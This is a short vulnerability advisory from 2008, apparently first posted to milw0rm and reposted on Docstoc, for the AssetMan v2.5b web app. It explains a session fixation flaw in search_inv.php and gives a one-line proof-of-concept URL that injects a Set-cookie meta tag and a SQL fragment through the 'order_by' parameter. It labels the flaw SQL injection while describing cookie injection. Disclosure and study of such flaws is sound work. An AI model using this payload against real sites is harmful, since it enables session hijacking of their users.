Docstoc

AssetMan v2.5b SQL Injection using Session Fixation Attack

Document Sample
AssetMan v2.5b SQL Injection using Session Fixation Attack Powered By Docstoc
					                              AssetMan v2.5b SQL Injection using Session Fixation Attack   Page 1/2
  1    ============================================================
  2    AssetMan v2.5−b   SQL Injection using Session Fixation Attack
  3    ============================================================
  4
  5                    ;                  ,
  6                 ,;                      ’.
  7               ;:                         :;
  8              ::                            ::
  9              ::                            ::
  10             ’:                            :
  11              :.                           :
  12           ;’ ::                         :: ’
  13          .’ ’;                          ;’ ’.
  14        ::      :;                      ;:       ::
  15        ;        :;.                 ,;:         ::
  16        :;         :;:             ,;"           ::
  17        ::.          ’:; ..,.; ;:’             ,.;:
  18          "’"...      ’::,::::: ;:      .;.;""’
  19              ’"""....;:::::;,;.;"""
  20          .:::.....’"’:::::::’",...;::::;.
  21        ;:’ ’""’"";.,;:::::;.’"""""" ’:;
  22      ::’               ;::;:::;::..              :;
  23    ::               ,;:::::::::::;:..              ::
  24    ;’        ,;;:;::::::::::::::;";..              ’:.
  25   ::        ;:" ::::::"""’:::::: ":                  ::
  26    :.       ::      ::::::; :::::::         :        ;
  27      ;      ::      ::::::: :::::::         :      ;
  28        ’    ::      ::::::....:::::’ ,:          ’
  29          ’ ::        :::::::::::::"       ::
  30             ::         ’:::::::::"’       ::
  31             ’:           """""""’         ::
  32              ::                         ;:
  33              ’:;                       ;:"
  34                 ’;                  ,;’
  35                     "’            ’"
  36                        ’
  37
  38
  39   AUTHOR : Neo Anderson   &  Rohit Bansal
  40   DATE   : 19th Sept,2008
  41   Email : neo.whizzy@gmail.com & rohitisback@gmail.com
  42
  43   #####################################################
  44
  45   #   Site           :   http://www.bctree.com/~assetman
  46   #   Bug            :   SQL Injection using Session Fixation Attack
  47   #   File           :   search_inv.php
  48   #   Variable       :   GET variable ’order_by’
  49
  50   #####################################################
  51
  52   # Impact of Vulnerability:
Neo Anderson                                                                               09/18/2008
                       AssetMan v2.5b SQL Injection using Session Fixation Attack                                 Page 2/2
  53
  54   By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, th
       e attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need
        to obtain the user’s session ID afterwards.
  55
  56   #####################################################
  57
  58   # Bug explanation − Session Fixation Attack/Meta Tag Exploitation:
  59
  60   By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the brows
       er. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
  61
  62   #####################################################
  63
  64   # PoC:
  65
  66   http://127.0.0.1/assetman/search_inv.php?action=search_all&order_by=%3Cmeta+http−equiv=’Set−cookie’+content=’=value’%
       3E&order=DESC+limit+1,1−−
  67
  68   #####################################################
  69   # GreeTz
  70   InfySec , str0ke & EvilFingers
  71
  72   www.infysec.com
  73   www.evilfingers.com
  74
  75   #####################################################
  76
  77   # milw0rm.com [2008−09−18]




Neo Anderson                                                                                                       09/18/2008

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:23
posted:5/23/2010
language:English
pages:2